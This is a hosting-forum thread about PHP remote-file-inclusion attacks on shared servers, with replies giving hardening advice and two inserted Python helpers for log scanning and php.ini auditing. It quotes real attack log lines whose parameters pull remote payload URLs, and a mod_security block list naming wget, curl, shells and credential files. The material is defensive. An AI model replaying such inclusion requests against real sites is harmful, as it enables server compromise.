mod_security.. useless!

mo.mentum

Hello,

I've been dealing with this problem on several servers for some time now. From time to time, there always seems to be some user's site that uses some outdated forum script or something, that ends up allowing a hacker to run a perl script using apache.

I've done the usual thing of disabling wget and other transfer proggies. I also installed mod_security. But they still get through!

I see stuff like this in my error_log all the time:
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: lynx: command not found
sh: fetch: command not found
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.

I just can't figure out which site is being exploited to do this. They try a bunch of things that don't work. Then eventually, I'm not sure who, they end up able to execute their code which results in apache executing a couple of perl scripts that run themselves as apache and show up as such in "ps auxww" and "top". I have to manually kill them each time.

Is there anything I can do to stop this??
 
It's not useless at all. Do you rely on mod_security to be your only line of defense? Mod Sec should be but one means of security but certainly not the only. If your rules are stellar then mod sec will take care of almost all of them. Certainly it will not stop a spammer from compromising a 3rd party application in a module that is included in the Gallery for instance, or it will not prevent somebody compromising an account where the password has been sniffed, but it certainly does its job for what it's worth. If your server has been compromised based off a user site that was compromised, this tells me you have taken no further action to secure anything outside of the users' webspace.
 
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
If a hacker was able to execute these commands, that means your server is likely compromised. I suggest you seek help from your host, or you can seek professional help to look into your server to assess the damage, secure and harden your server.
 
Try to do these things

1. Check for rootkit by rkhunter and chkrootkit
2. mount /tmp noexec,nosuid
3. Turn ON open_basedir for all domains
4. Disable functions in php.ini eg. exec passthru system ...
5. Did you load any security rules for mod_security or just installed it?
 
It doesn't necessarily mean that the server is "compromised", these could be failed attempts.

Rkhunter and chkroot are great tools; but this could be, as you write, the result of an insecure PHP script that's letting stuff in through G/P parameters. GREP your user scripts for calls to any function listed here:

http://ca.php.net/manual/en/ref.exec.php

and backticks as well! These functions should generally be disabled in a shared environment nonetheless, and you should have every user confined to their home folder with open_basedir on the most recent version of the PHP SAPI that you use.

Disabled exec and open_basedir should prevent these types of things.

And get rid of Perl ;)
 
Hi guys. Thanks for the input! OK, now I have a basic ruleset in there for mod_sec. But I still get lots of requests like the ones you will see attached below. Now I went ahead and downloaded the scripts that this code tries to put on the server, went through it, and saw the different commands they attempt to run to get their malicious code on the server, and I chmod'ed all of it to 700. But I would still like to catch them before they even try. Anyone have a solid ruleset for mod_sec? I've included mine below the hack attempts!

Now I know I could go around and tell my clients to clean up their code so as not to allow this, but I have hundreds of clients spread over a dozen servers. Not feasible.

[1]
******.com.log:geckowebhost.com - - [10/Feb/2008:09:47:30 -0500] "GET //index.php?selskin=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 200 43 "-" "libwww-perl/5.808"

******.com.log:222.239.227.171 - - [10/Feb/2008:10:00:39 -0500] "GET //index.php?selskin=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 43 "-" "libwww-perl/5.65"

[2]
******.log:fjo66.internetdsl.tpnet.pl - - [10/Feb/2008:08:54:33 -0500] "GET /index.php?x=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"

[3]
******.org.log:wpc1639.amenworld.com - - [10/Feb/2008:01:52:40 -0500] "GET /agenda/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 79 "-" "libwww-perl/5.79"

******.org.log:wpc1639.amenworld.com - - [10/Feb/2008:01:53:28 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"

[4]
******.com.log:cpe00123fb0b178-cm0012c9daef0c.cpe.net.cable.rogers.com - - [10/Feb/2008:12:13:39 -0500] "GET /fr/news/index.php?id_news=http://migirlsadaoiwqiseatmeisum.mail333.su/body? HTTP/1.1" 200 14517 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

[5]
******.com.log:c-71-60-166-84.hsd1.pa.comcast.net - - [10/Feb/2008:08:35:51 -0500] "GET /index.php?option=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 69 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

[6]
******.com.log:84.53.83.254 - - [10/Feb/2008:13:32:24 -0500] "GET //templates/headline_temp.php?nst_inc=http://www.viperwarez.com/ownd/yes.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"

[7]
******.ca.log:srv017.infobox.ru - - [10/Feb/2008:08:59:38 -0500] "GET //includes/kb_constants.php?module_root_path=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803"
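An added example, not from the thread, aimed at the "which site is being exploited" question: a Python scanner over access-log lines in the same shape as the excerpts above (the sample lines, hosts and addresses below are constructed placeholders). It flags any request whose query parameter value is itself a URL, which is what every excerpt above has in common, and ranks the targeted scripts, putting those that answered 200 first since those are the ones that actually ran the request.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log line, optionally prefixed by grep with the per-site file name ("site.log:").
LOG_RE = re.compile(
    r'^(?:(?P<vhost>[^\s:]+\.log):)?(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself a URL is the signature of a remote file inclusion attempt.
URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines in the shape of the thread's excerpts (placeholder hosts, not real ones).
SAMPLE_LOG = """\
shop.example.log:203.0.113.5 - - [10/Feb/2008:09:47:30 -0500] "GET //index.php?selskin=http://attacker.example/id.txt?? HTTP/1.1" 200 43 "-" "libwww-perl/5.808"
blog.example.log:198.51.100.7 - - [10/Feb/2008:10:00:39 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://attacker.example/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
198.51.100.9 - - [10/Feb/2008:12:13:39 -0500] "GET /fr/news/index.php?id_news=42 HTTP/1.1" 200 14517 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"
"""

def find_rfi_attempts(lines):
    """Return one record per request whose query string carries a URL as a parameter value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split on the first '?' by hand: urlsplit would read a leading '//index.php' as a host name.
        path, _, query = m.group('target').partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            if URL_VALUE.match(value):
                hits.append({'vhost': m.group('vhost') or '-', 'script': path, 'param': name,
                             'remote': value, 'status': int(m.group('status')),
                             'client': m.group('client'), 'agent': m.group('agent')})
    return hits

def rank_targets(hits):
    """Group attempts by (vhost, script); a 200 answer means the script exists and ran, so it sorts first."""
    table = {}
    for h in hits:
        entry = table.setdefault((h['vhost'], h['script']), {'attempts': 0, 'answered': False})
        entry['attempts'] += 1
        entry['answered'] |= h['status'] == 200
    return sorted(table.items(), key=lambda kv: (not kv[1]['answered'], -kv[1]['attempts']))

if __name__ == '__main__':
    for (vhost, script), info in rank_targets(find_rfi_attempts(SAMPLE_LOG.splitlines())):
        print(vhost, script, info)
```

Feed it the output of a grep for "=http" across all per-site logs and the first rows are the accounts to inspect; a 404 row is a probe against a script the site does not have.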
 
Oh. Here's my mod_sec


<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On

# Change Server: string
SecServerSignature "Apache"


# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off

# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog logs/audit_log

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# Action to take by default
SecFilterDefaultAction "deny,log,status:403"

## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ##

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "httpds "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "90\.txt "


SecFilter "bcc:"
SecFilter "bcc\x3a"
SecFilter "cc:"
SecFilter "cc\x3a"
SecFilter "bcc:|Bcc:|BCC:" chain
SecFilter "[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,4}\,\x20[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,4}"
SecFilterSelective POST_PAYLOAD "Bcc:"
SecFilterSelective POST_PAYLOAD "Bcc:\x20"
SecFilterSelective POST_PAYLOAD "cc:"
SecFilterSelective POST_PAYLOAD "cc:\x20"
SecFilterSelective POST_PAYLOAD "bcc:"
SecFilterSelective POST_PAYLOAD "bcc:\x20"
SecFilterSelective POST_PAYLOAD "bcc: "
SecFilterSelective THE_REQUEST "Bcc:"
SecFilterSelective THE_REQUEST "Bcc:\x20"
SecFilterSelective THE_REQUEST "cc:"
SecFilterSelective THE_REQUEST "cc:\x20"
SecFilterSelective THE_REQUEST "bcc:"
SecFilterSelective THE_REQUEST "bcc:\x20"
SecFilterSelective THE_REQUEST "bcc: "
# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective THE_REQUEST "/quick-reply\.php" chain
SecFilter "phpbb_root_path="

#!-- Start of additions from 26 January 2008


SecFilter "/usr/local/apache"
SecFilter "/usr/local/mysql"
SecFilter "/usr/X11R6/bin/xterm"
SecFilter "/etc/inetd\.conf" log,pass
SecFilter "/etc/shadow" log,pass
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter "conf/httpd\.conf" log,pass
SecFilter "HTTP/1\.1 403"
SecFilter "cmd32\.exe"
SecFilter "cmd\.exe"
SecFilter "\.cmd\?&"
SecFilter "document\.domain\("
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilterSelective ARG_highlight %27
SecFilterSelective ARG_highlight %2527
SecFilterSelective OUTPUT "Fatal error:"
SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid\=\("
SecFilterSelective OUTPUT ".*gid\=\("
SecFilterSelective THE_REQUEST "/cgi-bin/ls" log,pass
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/_vti_bin/" log,pass
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/~backup"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "/bin/ps"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilterSelective THE_REQUEST "/bin/kill"
SecFilterSelective THE_REQUEST "/usr/bin/chsh"
SecFilterSelective THE_REQUEST "/usr/bin/gcc"
SecFilterSelective THE_REQUEST "/usr/bin/cc"
SecFilterSelective THE_REQUEST "/usr/bin/cpp"
SecFilterSelective THE_REQUEST "/usr/bin/g\+\+"
SecFilterSelective THE_REQUEST "/bin/python"

SecFilter "/bin/sh"
SecFilter "/bin/bash"
SecFilter "/bin/tclsh"
SecFilter "/bin/ls"
SecFilter "/bin/echo"
SecFilter "/bin/python"
SecFilter "/bin/kill"
SecFilter "/bin/chmod"
SecFilter "/bin/cc"
SecFilter "/bin/uname"
SecFilter "/usr/bin/whoami"
SecFilter "/bin/gcc"
SecFilter "/chgrp"
SecFilter "/chown"
SecFilter "/etc/passwd"
SecFilter "/boot"
SecFilter "/etc"
SecFilter "/initrd"
# '+' is a regex quantifier, so it must be escaped to match the literal directory name
SecFilter "/lost\+found"
SecFilter "/mnt"
#SecFilter "/proc"
SecFilter "/root"
SecFilter "/sbin"
SecFilter "/var"
SecFilter "/usr/local/apache"
SecFilter "/usr/local/mysql"
SecFilter "/usr/X11R6/bin/xterm"
SecFilter "/etc/inetd\.conf" log,pass
SecFilter "/etc/shadow" log,pass
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter "conf/httpd\.conf" log,pass
SecFilter "HTTP/1\.1 403"
SecFilter "cmd32\.exe"
SecFilter "cmd\.exe"
SecFilter "\.cmd\?&"
SecFilter "document\.domain\("
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilter "_PHPLIB[libdir]"
SecFilter "cd\x20/tmp"
SecFilter "wget\x20"

</IfModule>
 
Now I know I could go around and tell my clients to clean up their code so as not to allow this, but I have hundreds of clients spread over a dozen servers. Not feasible.
Wholly feasible. Again, just edit your disabled functions in php.ini to include all of the shell exec commands I previously noted, and these types of scripts will be blocked at the source. If you additionally disable allow_url_fopen and allow it on a per-use basis for trusted customers, you'd be preventing these things from occurring entirely.
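An added example, not from the thread: a small Python checker that reads a php.ini and reports the settings the replies above say to change (disable_functions covering the exec family, allow_url_fopen Off, open_basedir set), with a constructed weak fragment beside its hardened counterpart. The function list and the open_basedir path are assumptions; allow_url_include is a later PHP directive that the thread does not mention.

```python
# Shell-execution functions the replies say to disable (PHP's "Program execution" family; the backtick
# operator maps onto shell_exec). Assumption: this is the list a shared host would start from.
EXEC_FUNCTIONS = {'exec', 'passthru', 'system', 'shell_exec', 'popen', 'proc_open', 'pcntl_exec'}

# Constructed php.ini fragments: the weak defaults beside the hardened counterpart (paths are placeholders).
WEAK_INI = """\
[PHP]
; a remote URL can be include()d straight from a GET parameter
allow_url_fopen = On
disable_functions =
;open_basedir =
"""
HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,system,shell_exec,popen,proc_open,pcntl_exec
open_basedir = /home/:/tmp/:/usr/local/lib/php/
"""

def parse_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments and [sections] skipped, last value wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        key, sep, value = line.partition('=')
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def is_on(value):
    """php.ini booleans: 1/On/Yes/True are on, anything else (including empty) is off."""
    return value.strip().lower() in ('1', 'on', 'yes', 'true')

def audit(text):
    """Return findings for one php.ini text; an empty list means it matches the thread's recommendations."""
    s = parse_ini(text)
    findings = []
    if is_on(s.get('allow_url_fopen', 'On')):          # PHP's built-in default is On
        findings.append('allow_url_fopen is On: include() of a URL taken from a GET parameter will fetch it')
    if is_on(s.get('allow_url_include', 'Off')):       # PHP 5.2+ directive, not mentioned in the thread
        findings.append('allow_url_include is On')
    disabled = {f.strip().lower() for f in s.get('disable_functions', '').split(',') if f.strip()}
    missing = sorted(EXEC_FUNCTIONS - disabled)
    if missing:
        findings.append('disable_functions is missing: ' + ', '.join(missing))
    if not s.get('open_basedir'):
        findings.append('open_basedir is unset: scripts are not confined to the account directory')
    return findings

if __name__ == '__main__':
    for label, ini in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(label, audit(ini) or ['ok'])
```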
 